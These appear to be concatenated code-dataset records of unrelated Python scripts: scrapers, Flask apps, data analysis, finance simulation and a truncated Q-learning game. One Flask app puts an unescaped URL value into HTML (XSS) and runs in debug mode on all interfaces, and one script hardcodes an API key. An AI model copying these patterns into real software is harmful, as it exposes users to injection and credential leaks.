os.path.join('repos', '%s.git' % (name))\n print(repo_path)\n if os.path.isdir(repo_path):\n raise Exception(\"repo already exists\")\n os.mkdir(repo_path)\n\n proc = subprocess.Popen(('git', 'init', '--bare'),\n cwd=repo_path,\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n proc.wait()\n","sub_path":"selfgit/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"594036626","text":"import numpy as np\nimport cv2\nimport os\nfrom time import time\n\n\n#dirPath = '../frameChoice/active/closing/'\ndirPath = '../frameChoice/active/idle-arms-down/'\n\n#templateImg = cv2.imread(\"../frameChoice/template/transparent/morning-0.png\", -1) # this one has transparency\ntemplateImg = cv2.imread(\"../frameChoice/template/transparent/morning-0.png\", -1) # this one has transparency\n\n\nh, w, c = templateImg.shape\n\nfileList = os.listdir(dirPath)\n\nfor i,fileName in enumerate(fileList):\n print(i,'/',len(fileList))\n\n img1 = cv2.imread(dirPath + fileName,-1)\n img1 = cv2.resize(img1, (640,360), interpolation = cv2.INTER_AREA)\n\n result = np.zeros((h, w, 3), np.uint8)\n\n\n alpha = templateImg[:, :, 3] / 255.0\n result[:, :, 0] = (1. - alpha) * img1[:, :, 0] + alpha * templateImg[:, :, 0]\n result[:, :, 1] = (1. - alpha) * img1[:, :, 1] + alpha * templateImg[:, :, 1]\n result[:, :, 2] = (1. - alpha) * img1[:, :, 2] + alpha * templateImg[:, :, 2]\n\n\n\n cv2.imwrite(dirPath+fileName,result)\n\n","sub_path":"scripts/overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"206216544","text":"import requests\nfrom bs4 import BeautifulSoup\n\nquestions = []\nanswers = []\n\n\n# script https://coin.cashbet.com/faq/\ndef loadWord():\n quote_page = \"https://coin.cashbet.com/faq/\"\n page = requests.get(quote_page)\n soup = BeautifulSoup(page.content, \"html.parser\")\n # questions are in
\n for s in soup.findAll('a'):\n questions.append(s.findAll(text=True))\n\n # answers are in \n for s in soup.findAll('div', {\"class\": \"panel-body\"}):\n answer = \"\"\n # each paragraph is in

\n for p in s.findAll('p'):\n paragraph = p.findAll(text=True)\n if paragraph != []:\n if answer == \"\":\n answer += paragraph[0]\n else:\n answer = answer + \" \" + paragraph[0]\n # scraping youtube video url\n for url in p.find_all('iframe'):\n if answer == \"\":\n answer += url['src']\n else:\n answer = answer + \" \" + url['src']\n # scraping bullet points\n for li in s.findAll('li'):\n list_ = li.findAll(text=True)\n answer = answer + \" \" + list_[0]\n answers.append(answer)\n # for url in soup.find_all('iframe'):\n # print(url['src'])\n # for s in soup.findAll('p'):\n # answers.append(s.findAll(text=True))\n # answers.append(s.findAll(text=True)) for s in soup.findAll('p'))\n # print(answers)\n return (questions, answers)\n\n\n# write data in text files\ndef write_data_txt(scripted_data):\n questions, answers = scripted_data\n # create text file for questions\n questions_txt_file = open(\"questions.text\", \"w\")\n # create text file for answers\n answers_txt_file = open(\"answers.text\", \"w\")\n for question in questions:\n if question != []:\n # to get only question sentense, filters by ?\n if question[0][len(question[0])-1] == \"?\":\n questions_txt_file.write(question[0] + \"\\n\")\n questions_txt_file.close()\n for answer in answers:\n # if answer != []:\n answers_txt_file.write(answer + \"\\n\")\n answers_txt_file.close()\n\n\ndef main():\n scripted_data = loadWord()\n write_data_txt(scripted_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CashBet_webscraping.py","file_name":"CashBet_webscraping.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"387149528","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 28 09:41:18 2021\n\n@author: padma carstens\n\"\"\"\n\nimport os\nfrom os.path import exists\nimport json\nfrom ldcoolp.curation import retrieve\n\n#Enter article id for published articles:this is the also last number in the \"cite\" on data.lib.vt.edu \narticle_id=1234\n#Enter your token below\ntoken='1234'\n#Enter published accession number from the spreadsheet\nPublishedAccessionNumber= \"P123\"\n#Enter requestor name\nRequestor=\"XYZ\"\n#Enter corresponding author name\nCorrespondingAuthor=\"XYZ\"\n#Enter version\nVersion=\"01\"\n#Enter published date in YYYYMMDD format \nDatePublished= \"20211025\" \n\n#Create Publication folder to store dataset\ndata_directory1=f\"{PublishedAccessionNumber}_v{Version}\"\ndata_directory2=f\"{PublishedAccessionNumber}_{Requestor}_{CorrespondingAuthor}_v{Version}_{DatePublished}\"\ndata_directory3=f\"DisseminatedContent\"\ndata_directory_path=os.path.join(data_directory1, data_directory2, data_directory3)\nmetadata_directory_path=f\"{PublishedAccessionNumber}_DownloadedFileMetadata_v{Version}\"\n#-----Download dataset for published article using LD-Cool-P and save it as publication meta data in json file format\npublicfigshare_url='https://api.figshare.com/v2/articles/'+str(article_id)\nfrom figshare.figshare import Figshare\nfs=Figshare(token=token,private=False)\nFileDownload=retrieve.download_files(article_id, fs, data_directory=data_directory_path, metadata_directory=metadata_directory_path)\n#-----get article details for published article using LD-Cool-P and save it as published metadata in json file format\njson_out_file1=f\"{data_directory_path}/{PublishedAccessionNumber}_DisseminatedMetadata.json\"\njson_response1=fs.get_article_details(article_id,version=None)\n\n\nif not os.path.exists(json_out_file1):\n with open(json_out_file1, 'w') as f:\n json.dump(json_response1,f,indent=4)\nelse:\n print(f\"File exists: {json_out_file1}\")\n if overwrite:\n print(\"Overwriting!\")\n with open(json_out_file1, 'w') as f:\n json.dump(json_response1,f,indent=4)\n \n#----------------------create VTCurationServicesActions folder to save provenance log and email correspondence\n \ndata_directory4=f\"VTCurationServicesActions\" \ndata_directory_path2=os.path.join(data_directory1,data_directory2,data_directory4)\nos.mkdir(data_directory_path2)\nprint(\"Directory '% s' created\" % data_directory4) \n","sub_path":"create_publication_bag.py","file_name":"create_publication_bag.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"551483469","text":"# -- coding: utf-8 --\n\n'''\n 代销公募基金基本信息和净值数据\n'''\n\nfrom fundSelect import fundPool\nimport pandas as pd\nfrom datetime import datetime,date\nimport numpy as np\nfrom PrintInfo import PrintInfo\nfrom GetHistoryData.GetProductData import GetProductData\n\nclass SetPortfolio:\n def __init__(self,assetIndex={},backDate=date.today().strftime('%Y-%m-%d')):\n self.dicProduct = fundPool.getFundPool()\n self.getInfoFlag = True\n self.backDate = backDate\n self.assetIndex = assetIndex #大类资产指数\n self.PrintInfoDemo = PrintInfo() # 日志信息模块\n\n #初步过滤基金池,并对基金池归类\n def firstSelect(self, fundInfoDf):\n def dateFormat(tempSe):\n tempList = [tempSe[k].strftime('%Y-%m-%d') for k in tempSe.index.tolist()]\n resutlt = pd.Series(tempList,index=tempSe.index)\n return resutlt\n\n #过滤掉成立日期小于指定日期的基金\n fundInfoDf['FUND_SETUPDATE'] = dateFormat(fundInfoDf['FUND_SETUPDATE'])\n fundDf = fundInfoDf.loc[fundInfoDf['FUND_SETUPDATE']<=self.backDate]\n\n #过滤掉定期开放的基金\n fundDf['nameFlag'] = [name.find(u'定期开放') for name in fundDf['FUND_FULLNAME'].tolist()]\n fundDf = fundDf[fundDf['nameFlag']==-1]\n fundDf.drop(labels=['nameFlag'],axis=1,inplace=True)\n\n #按照基金的二级分类,对基金池划分\n dicFundStyle = {}\n for typeName,tempDf in fundDf.groupby(['FUND_INVESTTYPE']):\n dicFundStyle[typeName] = tempDf\n return dicFundStyle\n\n #再次处理基金池,返回大类对应的产品和基金净值数据\n def secondSelect(self,dicFundDf,fundNetValueUpdateDf):\n dicResult = {}\n # if u'被动指数型基金' in dicFundDf:\n # tempETFDf = dicFundDf[u'被动指数型基金']\n\n dicResult['000016.SH'] =['110020.OF']\n dicResult['000300.SH'] = ['270010.OF']\n dicResult['000905.SH'] = ['162711.OF','110026.OF']\n dicResult['SPX.GI'] = ['270042.OF']\n dicResult['CBA00601.CS'] = ['001021.OF']\n # dicResult['AU9999.SGE'] = ['002610.OF']\n dicResult['AU9999.SGE'] = ['518800.OF']\n\n totalSelectList = []\n for key,value in dicResult.items():\n totalSelectList = totalSelectList+value\n resultDf = fundNetValueUpdateDf[totalSelectList]\n return dicResult,resultDf\n\n #整理净值数据\n def settleFundNetValue(self,fundInfoDf,fundNetValueDf):\n def fifteData(tempSe):\n startDate = fundInfoDf.ix[tempSe.name, 'FUND_SETUPDATE']\n tempSe[tempSe.indexOne pageOne looove\"\"\")\n self.assertEqual(page.parse_media(), [])\n\n def test_media_returns_all_images_attributes(self):\n html = u\"\"\"\n

One page

\n

Yéâh

\n \"image-1\"/\n \n \n \n \"\"\"\n page = FlatPage(content=html)\n self.assertEqual(page.parse_media(), [\n {'url': '/media/image1.png', 'title': 'Image 1', 'alt': 'image-1', 'mimetype': ['image', 'png']},\n {'url': '/media/image2.jpg', 'title': '', 'alt': '', 'mimetype': ['image', 'jpeg']}\n ])\n\n def test_flatpages_is_a_link(self):\n html = u\"http://www.makina-corpus.com\"\n page = FlatPage(content=html)\n self.assertEqual(page.link, 'http://www.makina-corpus.com')\n","sub_path":"rando/flatpages/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"59020881","text":"import pandas as pd\nimport numpy as np\nfrom scipy import interp\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import roc_curve, auc\nfrom matplotlib import pyplot as plt\n\n\ndef modeling(feature):\n feature_labels = pd.read_excel(\"../cache/feature_21D_hg18_0507.xls\", sheetname='y').columns[4:, ]\n feature_labels = [feature_label.split(\"E017-\")[1] for feature_label in feature_labels]\n labels = []\n for i in feature_labels:\n if str(i).split('_')[0] not in labels:\n labels.append(str(i).split('_')[0])\n df_y = pd.read_excel(feature, header=None, sheetname='y').fillna(0)\n df_n = pd.read_excel(feature, header=None, sheetname='n').fillna(0)\n df = df_y.append(df_n)\n # df = pd.read_csv(\"../cache/Xcov_Data.csv\", header=None).fillna(0)\n # index = [i for i in range(4, 25)] + [i for i in range(67, 88)] # index = [i for i in range(151, 172)]\n # index = [j for j in range(4 + 21 * i, 4 + 21 * (i + 1))]\n index = [i for i in range(4, df.shape[1])]\n data = df.iloc[:, index]\n data = np.matrix(data)\n target = df.iloc[:, 3]\n target = np.array(target)\n k_flods = StratifiedKFold(n_splits=10, shuffle=True)\n rf = RandomForestClassifier(n_estimators=500)\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 200)\n i = 0\n for train_index, test_index in k_flods.split(data, target):\n X_train, X_test = data[train_index], data[test_index]\n y_train, y_test = target[train_index], target[test_index]\n rf.fit(X_train, y_train)\n # 特征重要性\n importance = rf.feature_importances_\n # print(importance)\n # print(feature_labels)\n plt.bar(range(1, X_train.shape[1] + 1), importance, 0.5, align='center')\n plt.xlim(-1, 190)\n for i in np.arange(21.5, 180, 21):\n plt.vlines(i, 0, ymax=0.015, colors='m', linestyles=\"dashed\")\n plt.xticks(range(11, 189, 21), labels, fontsize=20)\n plt.yticks(fontsize=20)\n plt.xlabel('Features Type', fontsize=24)\n plt.ylabel('The Importance of Feature', fontsize=24)\n # plt.rc('xtick', labelsize=1)\n plt.tight_layout()\n plt.title(\"Feature importance\", fontsize=28)\n pixel = plt.gcf()\n pixel.set_size_inches(20, 12)\n pixel.savefig(\"../pic/feature_importance_0531.eps\", format='eps', dpi=1000)\n # plt.show()\n importances = importance.reshape(9, 21)\n plt.matshow(importances, cmap=plt.cm.hot)\n plt.colorbar().set_label(\"The importance of the features\", rotation=270, labelpad=20)\n plt.xticks(range(0, 21), range(-10, 11))\n plt.yticks(range(0, 9), labels)\n pixel = plt.gcf()\n pixel.savefig(\"../pic/feature_importance_0531_pixel.eps\", format='eps', dpi=1000)\n # plt.show()\n exit()\n y_pred_rf = rf.predict_proba(X_test)[:, 1]\n # print(y_pred_rf)\n # exit()\n fpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\n tprs.append(interp(mean_fpr, fpr_rf, tpr_rf))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr_rf, tpr_rf)\n aucs.append(roc_auc)\n # plt.plot(fpr_rf, tpr_rf, label='ALL Feature %d, AUC=%0.3f' % (i, roc_auc))\n i += 1\n plt.plot([0, 1], [0, 1], 'k--')\n mean_tpr = np.mean(tprs, axis=0)\n mean_fpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n plt.plot(mean_fpr, mean_tpr, label=\"Mean AUC=%0.3f $\\pm$ %0.3f\" % (mean_auc, std_auc))\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n plt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='red', alpha=.2,\n label='$\\pm$ 1 std. dev.')\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n plt.title('ROC curve')\n plt.legend()\n plt.show()\n\n\nif __name__ == \"__main__\":\n modeling(\"../cache/feature_21D_hg18_0506.xls\")\n","sub_path":"src_old/plot_roc_auc.py","file_name":"plot_roc_auc.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536159879","text":"from flask import Flask, request, escape, render_template\nfrom werkzeug.exceptions import HTTPException, BadRequest\n\nimport random\n\n'''\nNotes on how to run locally:\n\nTo build docker in the local directory use the following and pass a name to call for run:\ndocker build --tag name . \n\nIf no name passed then note the pid and use that to run:\ndocker run -d -p 8080:8080 [name or id]\n\nStop the instance with:\ndocker stop [id - first 4]\n\nDeploy to registry\n'''\napp = Flask(__name__)\n\n@app.route('/', methods=['POST', 'GET'])\n@app.route('/', methods=['POST', 'GET'])\ndef say_hello(name='World'):\n\n color = \"%06x\" % random.randint(0, 0xFFFFFF)\n style = \"style=\\\"background-color:#\" + str(color) + \"\\\"\"\n combined_html = \"

Hello \" + name + \"!!!

\"\n\n # Option to simply return hello\n # return 'Hello {}!'.format(escape(name))\n # Option passes the generated html to the page\n return combined_html\n\n@app.errorhandler(404)\ndef not_found(error):\n return \"\"\"

404

\"\"\"\n\n #Option to use template \n #return render_template('home.hml')\n\n@app.errorhandler(BadRequest)\ndef handle_bad_request(e):\n return 'bad request!', 400\n\n@app.errorhandler(HTTPException)\ndef handle_exception(e):\n \"\"\"Return JSON instead of HTML for HTTP errors.\"\"\"\n # start with the correct headers and status code from the error\n response = e.get_response()\n # replace the body with JSON\n response.data = json.dumps({\n \"code\": e.code,\n \"name\": e.name,\n \"description\": e.description,\n })\n response.content_type = \"application/json\"\n return response\n\nif __name__ == '__main__':\n # Use when running locally\n #app.run(host='0.0.0.0', use_reloader=True, debug=True)\n\n app.run(host='0.0.0.0',port=8080, use_reloader=True, debug=True, threaded=True)","sub_path":"python/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207734417","text":"class Solution:\n def isRectangleCover(self, rectangles):\n area, corners = 0, set()\n a, c = lambda: (X - x) * (Y - y), lambda: {(x, y), (x, Y), (X, y), (X, Y)}\n for x, y, X, Y in rectangles:\n area += a()\n corners ^= c()\n x, y, X, Y = (f(z) for f, z in zip((min, min, max, max), zip(*rectangles)))\n return area == a() and corners == c()\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.isRectangleCover([[1, 1, 3, 3], [3, 1, 4, 2], [3, 2, 4, 4], [1, 3, 2, 4], [2, 3, 3, 4]]) is True)\n","sub_path":"Solutions/391. Perfect Rectangle/391.py","file_name":"391.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634925643","text":"import RPi.GPIO as GPIO\nfrom flask import Flask\nfrom flask import jsonify, request\nimport time\n\napp = Flask(__name__)\n\n@app.route(\"/fetchSensorData\", methods=['POST'])\ndef fetchSensorData():\n\n GPIO.setmode(GPIO.BCM)\n TRIG= int(request.form['TRIG'])\n ECHO = int(request.form['ECHO'])\n\n GPIO.setup(TRIG, GPIO.OUT)\n GPIO.setup(ECHO, GPIO.IN)\n\n GPIO.output(TRIG, False)\n print('waiting for sensor')\n time.sleep(2)\n\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n\n pulse_start = 0\n pulse_end = 0\n while GPIO.input(ECHO) == 0:\n pulse_start = time.time()\n\n while(GPIO.input(ECHO) == 1):\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration*17150\n distance = round(distance,2)\n\n GPIO.cleanup()\n \n sensor_data = {\"distance\": distance}\n\n return jsonify(sensor_data)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80, debug=True)\n","sub_path":"FlaskCode/sensor_server.py","file_name":"sensor_server.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"590934490","text":"# _*_ coding : utf-8 -*-\n\n\"\"\"\nFlowGraphのtreeファイルから共起頻度を計算\n入力: viob2ファイル\n 各行 : レシピ1stepの文章\n スペース区切りで word/iob2tag\n 出力保存先ディレクトリ\n出力: co_occurrence.pickle\n keywordsのリスト\n 各keywordsの頻度\n 共起頻度を表す行列(インデックスは上記のリスト順) \n\"\"\"\n\nimport os\nimport argparse\nimport glob\nimport itertools\nimport pickle\nimport codecs\nimport pandas as pd\nimport numpy as np\n\n\nRECIPE = 1715343\n\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_path', help=u'入力ファイル')\n parser.add_argument('synonym_path', help=u'料理オントロジーファイル')\n parser.add_argument('output_dir', help=u'出力ディレクトリ')\n parser.add_argument('-t', '--tags', help='使用するタグ(tag1,tag2,...)', type=str, default='F,T,D,Q,Ac,Af,Sf,St')\n params = parser.parse_args()\n\n return vars(params)\n\n\ndef read_synonym(synonym_path):\n synonyms = pd.read_csv(synonym_path, delimiter='\\t', header = None, encoding='utf-8')\n idx = list((synonyms.iloc[:, 0] != u'調理器具') & (synonyms.iloc[:, 0] != u'動作'))\n ontology = dict(zip(synonyms.iloc[idx, 2], synonyms.iloc[idx, 1]))\n return ontology\n\n\ndef parse_keywords(line, ontology, used_tags):\n keywords_by_step = []\n for token in line:\n token = token.split('/')\n if len(token) == 2:\n word = token[0]\n iob2_format = token[1].split('-')\n if len(iob2_format) == 2:\n recipe_tag = iob2_format[0]\n iob2_tag = iob2_format[1]\n if recipe_tag in used_tags:\n if iob2_tag == 'B':\n keywords_by_step.append(word)\n elif iob2_tag == 'I':\n keywords_by_step[-1] += word \n # ontologyに入っているもののみ\n keywords_by_step = [ontology[keyword] for keyword in keywords_by_step if keyword in ontology]\n keywords_by_step = list(set(keywords_by_step)) # 重複を除く\n return keywords_by_step\n\n\ndef extract_keywords(line, recipe_no, keywords, tmp_keywords, occur, ontology, used_tags):\n keywords_by_step = []\n line = line.split()\n if len(line) == 0: #レシピ終了\n for kwd in tmp_keywords:\n occur[keywords.index(kwd)] += 1\n tmp_keywords = []\n recipe_no += 1\n else:\n keywords_by_step = parse_keywords(line, ontology, used_tags)\n for kwd in keywords_by_step: # 重複を除く\n if kwd not in keywords: # 初めて登場したレシピ用語\n keywords.append(kwd)\n tmp_keywords.append(kwd)\n occur.append(0)\n elif kwd not in tmp_keywords: # レシピ中で初めて登場したレシピ用語\n tmp_keywords.append(kwd)\n return recipe_no, keywords, tmp_keywords, occur\n\n\ndef count_cooccurrence(line, recipe_no, keywords, tmp_keywords, cooccur, ontology, used_tags):\n keywords_by_step = []\n line = line.split()\n if len(line) == 0:\n for kwd1, kwd2 in itertools.combinations(tmp_keywords, 2):\n if kwd1 in keywords and kwd2 in keywords: \n idx1 = keywords.index(kwd1)\n idx2 = keywords.index(kwd2)\n cooccur[idx1, idx2] += 1\n cooccur[idx2, idx1] += 1\n tmp_keywords = []\n recipe_no += 1\n else:\n keywords_by_step = parse_keywords(line, ontology, used_tags)\n for kwd in keywords_by_step:\n if kwd not in tmp_keywords:\n tmp_keywords.append(kwd) # レシピ中で初めて登場したレシピ用語\n return recipe_no, cooccur, tmp_keywords\n\n\ndef main(params):\n input_path = params['input_path']\n synonym_path = params['synonym_path']\n output_dir = params['output_dir']\n used_tags = params['tags']\n\n used_tags = used_tags.split(',')\n print(used_tags)\n\n tag_str = ''\n for t in used_tags:\n tag_str += t\n\n ontology = read_synonym(synonym_path)\n\n # レシピに出現するキーワードを全て取得\n output_file = os.path.join(output_dir, 'viob2_keywords_%s.pickle' % tag_str)\n if os.path.exists(output_file):\n with open(output_file, 'rb') as fin:\n keywords, occur, recipe_no = pickle.load(fin)\n else:\n keywords = []\n occur = []\n tmp_keywords = []\n recipe_no = 0\n with codecs.open(input_path, 'r', 'utf-8') as fin:\n for line in fin:\n line = line.strip()\n if recipe_no % 1000 == 0:\n print(\"extract keywords... %d \\r\"%recipe_no, end='') \n recipe_no, keywords, tmp_keywords, occur =\\\n extract_keywords(line, recipe_no, keywords, tmp_keywords, occur, ontology, used_tags)\n with open(output_file, 'wb') as fout:\n pickle.dump((keywords, occur, recipe_no), fout, protocol=0)\n\n\n # 行列を拡張していくのはコストが高いのでキーワード数を数えてから共起回数を数える\n i = 0\n tmp_keywords = []\n cooccur = np.zeros((len(keywords), len(keywords)))\n with codecs.open(input_path, 'r', 'utf-8') as fin:\n for line in fin:\n line = line.strip()\n if i % 1000 == 0:\n print(\"count co-occurrence... %d/%d \\r\"%(i, recipe_no), end='') \n i, cooccur, tmp_keywords =\\\n count_cooccurrence(line, i, keywords, tmp_keywords, cooccur, ontology, used_tags)\n\n print (\"keywords:%d \"%len(keywords))\n print (keywords[0:10])\n print (occur[0:10])\n print (\"cooccur \", cooccur.shape)\n print (cooccur[0:10, 0:10])\n\n with open(os.path.join(output_dir, 'viob2_cooccurence_%s.pickle' % tag_str), 'wb') as fout:\n pickle.dump((keywords, occur, cooccur, recipe_no), fout, protocol=0)\n\n\nif __name__ == '__main__':\n params = parse()\n main(params)\n\n","sub_path":"tools/grouping/python3/count_co-occurrence_viob2.py","file_name":"count_co-occurrence_viob2.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"600187710","text":"import requests\nfrom lxml import etree\nimport sys\nimport logging\nfrom texttospeech import TextToSpeech\n \n \nclass PSIReader:\n \n __apiURL = 'http://www.nea.gov.sg/api/WebAPI/?dataset=psi_update&keyref=781CF461BB6606ADEA01E0CAF8B35274602B7580279AFE8F'\n __proxies = {\"http\": 'http://host:port'}\n __xpathTemplate = \"/channel/item/region/id[text()='%s']/../record/reading[@type='NPSI']/@value\"\n \n \n def __init__(self):\n #print __name__\n global logger\n logger = logging.getLogger('PSIReader')\n hdlr = logging.FileHandler('myapp.log')\n formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s')\n hdlr.setFormatter(formatter)\n logger.addHandler(hdlr)\n logger.setLevel(logging.INFO)\n \n def getPSIUpdates(self):\n \n try:\n r = requests.get(PSIReader.__apiURL, \n verify=False)\n #print r.status_code\n #print r.headers\n xmlvalue = r.content\n r.close()\n return xmlvalue\n except:\n logger.error('Error', exc_info=True)\n \n @staticmethod \n def processXML(xmlvalue, regionCode, location):\n \n try:\n root = etree.fromstring(xmlvalue)\n val = root.xpath(PSIReader.__xpathTemplate % regionCode)\n psival = int(val[0])\n \n message = ''\n if psival >=0 and psival <=50:\n message = 'Good'\n elif psival >=51 and psival <=100:\n message = 'Moderate. You can do Normal activities. Stay Healthy'\n elif psival >=101 and psival <=200:\n message = 'Unhealthy. Take Mask. Drink Lot of Water and minimised outdoor activities'\n elif psival >=200 and psival <=300:\n message = 'Very unhealthy. Take Mask and Stay indoor. Drink Lot of Water'\n elif psival >=300:\n message = 'Hazardous. Take Mask and Stay indoor. Drink Lot of Water'\n else:\n return 'Looks like P S I value is not available from source'\n except:\n logger.error(\"Error: %s\" % sys.exc_info()[0], exc_info=True)\n return 'I am sorry, looks like P S I value is not available from source'\n \n return '%s P S I Value is %s and is %s' % (location, psival,message)\n\n def getPSIMessage(self, regionCode, location):\n xmlValue = self.getPSIUpdates()\n #print xmlValue\n text = self.processXML(xmlValue, regionCode, location)\n #print 'final message %s' % text\n return text\n \nif __name__==\"__main__\":\n \n psiReader = PSIReader()\n xmlValue = psiReader.getPSIUpdates()\n text = psiReader.processXML(xmlValue, 'rNO', 'Singapore North')\n tts = TextToSpeech()\n audioFile = 'psiblue.wav'\n tts.bluemixTTS(text, audioFile)\n #tts.googleTTS(\"I am done for the day google\", audioFile)\n tts.play(audioFile)\n #logger.info(xmlValue)\n print \n #print psiReader.processXML(xmlValue, 'rWE134', 'Singapore West')\n #print processXML(xmlvalue, 'rCE', 'Singapore Central')\n #print processXML(xmlvalue, 'rWE', 'Singapore West')\n #print processXML(xmlvalue, 'rEA', 'Singapore East')\n #print processXML(xmlvalue, 'rSO', 'Singapore South')\n","sub_path":"api/psireader.py","file_name":"psireader.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"581942394","text":"# Merton Jump Diffusion Model, 1976\n# Yves Hilpisch - Python for Finance p. 285 ff.\n# Stochastic Differential Equation on page 285\n# Euler Discretization Scheme page 286\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass JumpDiffusion():\n \"\"\"\n SDE: \n dS_t = (r - r_j)S_t dt + sigma S_t dZ_t + J_t S_t dN_t\n where\n S_t index level at date t\n r constant riskless rhot rate\n r_j defined as lambda * (e^{mu_j + delta**2/2 - 1}) drift correctionf or jump tomaintain risk neutrality\n sigma constant volatility of S\n Z_t Standard Brownian motion\n J_t Jump at date ti with distribution:\n log(1+J_t) approx. N(log(1+mu_j) - delta**2/2, delta**2)\n where N is the cumulative distribution function fo a standard normal random variable\n \"\"\"\n def __init__(self):\n self.S0 = 100.0\n self.r = 0.05\n self.sigma = 0.2\n self.lamb = 0.75\n self.mu = -0.6\n self.delta = 0.25\n self.T = 1.0\n\n def _simulate(self):\n # We need three sets of independent random numbers in order to \n # simulate the jump diffusion\n # Input: tdat, r, startvalue, days, sigma)\n \n M = 10 # Maturity # Default: 50\n I = 1 # Number of Paths # Default: 10000\n dt = self.T/M\n rj = self.lamb * (np.exp(self.mu + 0.5 * self.delta**2) - 1)\n S = np.zeros((M+1, I))\n S[0] = self.S0\n sn1 = np.random.standard_normal((M+1, I))\n sn2 = np.random.standard_normal((M+1, I))\n poi = np.random.poisson(self.lamb * dt, (M+1, I))\n for t in range(1, M+1, 1):\n S[t] = S[t-1] * (np.exp((self.r - rj - 0.5 * self.sigma**2) * dt + self.sigma * np.sqrt(dt) * sn1[t]) + (np.exp(self.mu + self.delta * sn2[t]) - 1) * poi[t])\n S[t] = np.maximum(S[t], 0)\n return S\n\n def _run(self, plot = True):\n S = self._simulate()\n \n if plot:\n # Histogram\n plt.hist(S[-1], bins = 50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.show()\n\n # Paths\n plt.plot(S[:, :10], lw = 1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.show()\n\nif __name__ == '__main__':\n jd = JumpDiffusion()\n jd._run()\n\n","sub_path":"BitcoinPricingKernels/src/jump_diffusion.py","file_name":"jump_diffusion.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"507129051","text":"from tictactoe_env import TicTacToe\nimport pdb \nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nimport random\n\ndef tabular_epsilon_greedy_policy(Q, eps, state):\n action = 0\n rand = random.uniform(0, 1)\n if rand <= eps :\n action = random.randrange(1, 9)\n else :\n action = np.argmax(Q[state])\n return action\n\nclass QLearning(object):\n def __init__(self, num_states, num_actions, alpha=0.5, gamma=0.9):\n self.Q = {}\n self.alpha = alpha\n self.gamma = gamma\n\n def update(self, state, action, reward, next_state, done):\n self.Q[state][action]+= self.alpha * (reward + (self.gamma * np.max(self.Q[next_state])) - self.Q[state][action])\n \ndef main():\n env = TicTacToe()\n done = False\n state = env.reset()\n epsilon_greedy_policy = QLearning(19683, 9) #3^9=19683\n num_episodes = 100\n eps = 0.005\n epsilon_greedy_rewards = []\n epsilon_greedy_start_qs = []\n saved_Q_table = []\n Qs = []\n Qdict=epsilon_greedy_policy.Q\n count=0\n for i in range(num_episodes):\n state = env.reset()\n done = False\n ep_rewards = 0\n list_states=[''.join(list(state.flatten().astype(str)))]\n list_actions=[]\n list_rewards=[]\n while done == False:\n currentstateval=''.join(list(state.flatten().astype(str)))\n if currentstateval not in Qdict.keys():\n Qdict[currentstateval]=np.zeros((9))\n action = tabular_epsilon_greedy_policy(epsilon_greedy_policy.Q, eps, currentstateval)\n #action = int(input(\"Choose where to place (1 to 9): \"))\n if state[int((action)/3)][(action)%3]==0: #to eliminate output of an action to a cell that is already occupied.\n next_state,reward,done = env.step(action+1)\n list_actions.append(action)\n list_rewards.append(reward)\n 